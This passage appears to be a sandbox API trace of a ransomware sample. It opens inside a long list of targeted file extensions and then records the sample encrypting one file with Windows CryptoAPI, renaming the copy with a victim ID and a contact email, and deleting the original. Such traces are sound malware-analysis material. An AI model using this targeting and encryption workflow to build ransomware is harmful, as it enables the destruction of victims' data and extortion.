i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".json") returned 0x0
	[0168.583] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x598, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json.bk", cAlternateFileName="UTCAPP~1.BK")) returned 1
	[0168.583] lstrcmpW (lpString1="utc.app.json.bk", lpString2="..") returned 1
	[0168.583] lstrcmpW (lpString1="utc.app.json.bk", lpString2=".") returned 1
	[0168.584] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.584] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="utc.app.json.bk" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk"
	[0168.584] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk") returned 73
	[0168.584] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.584] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk", cchLength=0x49 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk") returned 0x49
	[0168.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.584] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk"
	[0168.585] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk") returned 73
	[0168.585] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.585] StrStrW (lpFirst=".bk", lpSrch=".") returned=".bk"
	[0168.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.585] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bk") returned=".bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.586] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.586] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.586] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.586] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x598, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x598, lpOverlapped=0x0) returned 1
	[0168.596] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.596] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb7f8) returned 1
	[0168.598] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.598] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0168.598] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.599] CryptHashData (hHash=0xfb9470, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0168.599] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.599] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb9470, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9430) returned 1
	[0168.599] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.599] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x598, dwBufLen=0x598 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x5a0) returned 1
	[0168.599] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.600] RtlMoveMemory (in: Destination=0xfde400, Source=0xfdc138, Length=0x598 | out: Destination=0xfde400) 
	[0168.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.600] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x598, dwBufLen=0x5a0 | out: pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x5a0) returned 1
	[0168.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.601] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0168.601] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.601] CryptDestroyHash (hHash=0xfb9470) returned 1
	[0168.601] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.601] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0168.601] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.601] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.602] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.602] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0168.603] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 115
	[0168.604] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0168.609] WriteFile (in: hFile=0x39c, lpBuffer=0xfde400*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde400*, lpNumberOfBytesWritten=0x18a648*=0x5a0, lpOverlapped=0x0) returned 1
	[0168.611] CloseHandle (hObject=0x39c) returned 1
	[0168.613] CloseHandle (hObject=0x390) returned 1
	[0168.613] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk")) returned 1
